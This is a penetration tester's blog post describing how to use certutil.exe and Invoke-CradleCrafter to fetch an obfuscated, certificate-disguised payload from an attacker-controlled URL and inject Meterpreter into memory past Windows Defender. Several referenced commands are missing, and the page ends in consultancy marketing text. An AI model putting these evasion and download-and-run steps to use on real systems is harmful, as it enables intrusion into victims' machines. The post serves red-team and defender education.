PowerShell: In-Memory Injection Using CertUtil.exe

May 31, 2018, Shane Rudy, Senior Security Consultant, Coalfire Labs

Have you ever heard the old saying, "The only constant in life is change?" Nothing is truer in the world of penetration testing and information security than the certainty of change. New defenses are always emerging, and the guys and gals in the red team game are always having to evolve our efforts to evade defenses. This week was one of those weeks for me.

I was ramping up for an internal engagement and had another one on the way when I discovered that Microsoft had just stepped up their game recently with Windows Defender, which is now present on just about every recent Microsoft operating system we run into. I started to panic a little. I had a good run for a few years using PowerShell cradles with Invoke-Shellcode to rein shells rather easily, but not anymore. Like all good things, my tried and true method had now been demolished.

But all was not lost. Recently I had been doing some research and gearing up for a class that I would be taking later this year at Black Hat on code-injection techniques. I had also read about Microsoft’s Certutil.exe in conjunction with PowerShell being able to perform in-memory injection on several blog sites. Lastly, I was introduced to the PowerShell module Invoke-CradleCrafter written by the very talented Daniel Bohannon. I had used Invoke-Obfuscation quite a bit so the transition to Invoke-CradleCrafter was pretty painless.

In this blog post I will discuss the steps to use PowerShell, Invoke-CradleCrafter and Microsoft’s Certutil.exe to craft a payload and one-liner that can be used to evade the latest version of Windows Defender (as of this writing), as well as tips for not getting caught by Intrusion Detection Systems and behavior analysis. After all, PowerShell is still one of the easiest and best ways to gain a foothold, but at the same time it is selling you out because it talks to AMSI as soon as it’s run, which makes things a bit challenging. The beauty of this method is that Microsoft’s certutil does the network call out to your main payload while appearing to be an innocent little certificate file instead of your standard PowerShell Invoke-Shellcode cradle, which most intrusion and behavioral systems are looking for these days.

Note that the payload file’s extension could be anything as long as certutil can get at it and read its content. For example, an organization may have a policy (or IDS, content filter, etc.) that does not allow the downloading of scripts, however they probably allow .txt files or even files with abnormal extensions. If you change it, just make sure you compensate for that when setting the URL in Invoke-CradleCrafter (see below).

Next you will create a folder that will be used to serve up web content. In this example we will call our folder payloads. Place the PowerShell Meterpreter PowerShell script inside this folder.

Next, we will use Invoke-CradleCrafter to obfuscate our certutil and PowerShell commands that will be used to perform in-memory injection bypassing Defender.

Drop into a PowerShell prompt on your Linux host either by typing pwsh or powershell. Once in, cd into your Invoke-CradleCrafter directory and run the following:

Import-Module .\Invoke-CradleCrafter.psd1; Invoke-CradleCrafter
At the prompt type: SET URL http(s)://<YOUR IP>/load.txt or you can use another extension, etc.

Next Type MEMORY and then CERTUTIL:

Next you will be presented with your obfuscation options. I typically select All and then type 1

Once you have the result, place it in a file called raw.txt on your Windows machine. You will encode this file in base64 using the certutil to create a file called cert.cer and place it on a webserver. We will then construct a one-liner that will be called remotely to pull down this file and get it executed on the target. Once it executes it will call our payload load.txt and inject Meterpreter via PowerShell into memory.

Use certutil to encode the raw.txt file:

Looks like a real certificate, doesn’t it?

Place your cert.cer in the payloads directory you will be serving up content in. Next, we will construct our one-liner, which can be placed into a batch file or executed from the command line or from great tools like CrackMapExec.

Note that for this attack to be successful, the Meterpreter PowerShell script that gets executed needs to be deleted manually. The cert.cer file will automatically get deleted, but you will need to delete stage.ps1 file once in a Meterpreter session by doing:

Also note that you can also just drop to PowerShell from a command shell you may have gotten by other means and copy in the contents of your stage.ps1 file to get your payload executed directly like so:

In closing, I am reminded of just how good change can be. Not only does change help you grow as a penetration tester by forcing you to research and try new techniques, it can also help you become a better consultant to your customers and educate them on how to be better equipped and tune their defenses to detect these ever-changing advanced attacks.

About

Coalfire Certificate Program

A Coalfire Certificate is proof-positive that information technology controls have been independently scanned, assessed or validated in accordance with the highest industry standards. Certificates can be displayed on websites or in print.

Coalfire started in 2001 with a simple idea – cyber threats are increasing, compliance mandates are getting more complicated, and a well-designed cybersecurity program can help fuel your overall success.

Coalfire helps organizations comply with global financial, government, industry and healthcare mandates while helping build the IT infrastructure and security systems that will protect their business from security breaches and data theft. The company is a leading provider of IT advisory services for security in retail, payments, healthcare, financial services, higher education, hospitality, government and utilities.

The Coalfire Board of Directors provides invaluable guidance for the organization and reflects Coalfire’s dedication to achieving success for our customers.

Coalfire’s executive leadership team comprises some of the most knowledgeable professionals in cybersecurity, representing many decades of experience leading and developing teams to outperform in meeting the security challenges of commercial and government clients. With diverse backgrounds in IT systems security, governmental security, compliance, and reducing risk while implementing the latest enabling technologies (such as the Cloud and IoT), our leaders understand the challenges customers face.

With a passion for quality, Coalfire uses a process-driven quality approach to improve the customer experience and deliver unparalleled results.

Created in honor of the late co-founder of Coalfire, the Richard E. Dakin Fund at The Denver Foundation is supporting scholarship programs at several universities for promising college students studying cybersecurity and related fields.

Security is a team game. If your organization values both independence and security, perhaps we should become partners.

The increased need for cyber security has become a common enterprise priority across the globe. However, industry requirements for effective cyber risk management are as distinct as the individual entities under fire. Enterprises and government organizations need more than an off-the-shelf audit to provide an effective threat assessment. They need industry- and organization-specific insights, tools and processes to protect digital assets and ensure compliance.

Coalfire can help cloud service providers prioritize the cyber risks to the company, and find the right cyber risk management and compliance efforts that keeps customer data secure, and helps differentiate products.

“Success” at a government entity looks different than at a commercial organization. Create cybersecurity solutions to support your mission goals with a team that understands your unique requirements.

The financial services industry was built upon security and privacy. As cyber-attacks become more sophisticated, a strong vault and a guard at the door won’t offer any protection against phishing, DDoS attacks and IT infrastructure breaches.

The continuum of care is a concept involving an integrated system of care that guides and tracks patients over time through a comprehensive array of health services spanning all levels of care. Interoperability is the central idea to this care continuum making it possible to have the right information at the right time for the right people to make the right decisions.

Maintaining network and data security in any large organization is a major challenge for information systems departments. However, in the higher education environment, the protection of IT assets and sensitive information must be balanced with the need for ‘openness’ and academic freedom; making this a more difficult and complex task.

When it comes to cyber threats, the hospitality industry is not a friendly place. Hotels and resorts have proven to be a favorite target for cyber criminals who are looking for high transaction volume, large databases and low barriers to entry.

The payments industry is undergoing rapid changes and unfortunately, an increasing risk for data breaches. Cyber criminals are growing increasingly businesslike, and payments leaders need to move quickly to cover their cyber risk.

The food and beverage industry is under attack from cyber criminals intent on stealing payment information. The food and beverage industry makes up the highest percentage of breach investigations, at nearly 73 percent, according to Visa.

The global retail industry has become the top target for cyber terrorists, and the impact of this onslaught has been staggering to merchants. To secure the complex IT infrastructure of a retail environment, merchants must embrace enterprise-wide cyber risk management practices that reduces risk, minimizes costs and provides security to their customers and their bottom line.

Private enterprises serving government and state agencies need to be upheld to the same information management practices and standards as the organizations they serve. Coalfire has over 16 years of experience helping companies navigate increasing complex governance and risk standards for public institutions and their IT vendors.

Technology innovations are enabling new methods for corporations and governments to operate and driving changes in consumer behavior. The companies delivering these technology products are facilitating business transformation that provides new operating models, increased efficiency and engagement with consumers as businesses seek a competitive advantage.

Cybersecurity has entered the list of the top five concerns for U.S. electric utilities, and with good reason. According to the Department of Homeland Security, attacks on the utilities industry are rising "at an alarming rate."

Cyber risk management, advisory, technology and compliance services. Manage risk and maximize return on investment to prevent data breaches and theft. Coalfire’s solutions are led by a team of industry experts that help enterprise organizations understand a wide range of compliance and risk management initiatives, which enables a consistent cybersecurity framework across the organization.

Expert assessments that provide an accurate understanding of what you are trying to protect, the inherent and residual cyber risk to your enterprise and the maturity of the your security program and underlying controls